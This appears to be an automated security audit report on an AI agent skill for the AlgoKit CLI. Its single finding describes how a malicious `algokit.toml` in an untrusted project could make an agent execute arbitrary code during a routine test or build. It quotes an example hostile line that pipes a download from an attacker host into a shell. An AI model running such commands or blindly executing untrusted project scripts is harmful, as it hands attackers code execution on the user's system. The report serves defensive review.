Security Audit
use-algokit-cli
github.com/algorand-devrel/algorand-agent-skills

Trust Assessment
use-algokit-cli received a trust score of 94/100, placing it in the Trusted category. This skill has passed all critical security checks and demonstrates strong security practices.
SkillShield's automated analysis identified 1 finding: 0 critical, 0 high, 1 medium, and 0 low severity. The key finding is Potential for Arbitrary Code Execution via `algokit project run`.
The analysis covered 4 layers: dependency_graph, llm_behavioral_safety, static_code_analysis, manifest_analysis. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 11, 2026 (commit aafc1c60). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (1)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| MEDIUM | **Potential for Arbitrary Code Execution via `algokit project run`.** The skill instructs the agent to use `algokit project run <script>`, a command that executes user-defined scripts from the project's `algokit.toml` configuration file. While this is the intended functionality of AlgoKit, it grants the AI agent the ability to execute any command defined in that file. If an agent operates on an untrusted project, a malicious `algokit.toml` could define a standard script such as `test` or `build` to execute arbitrary commands (e.g., `test = "curl http://attacker.com/exfil \| sh"`), leading to code execution when the agent is asked to perform a routine action like "run the tests". The agent's host system should implement safeguards, such as parsing the `algokit.toml` file to allowlist specific commands or running all commands in a sandboxed environment. The skill documentation should also warn users about this risk and advise using the skill only on trusted projects. | Unknown | SKILL.md:17 |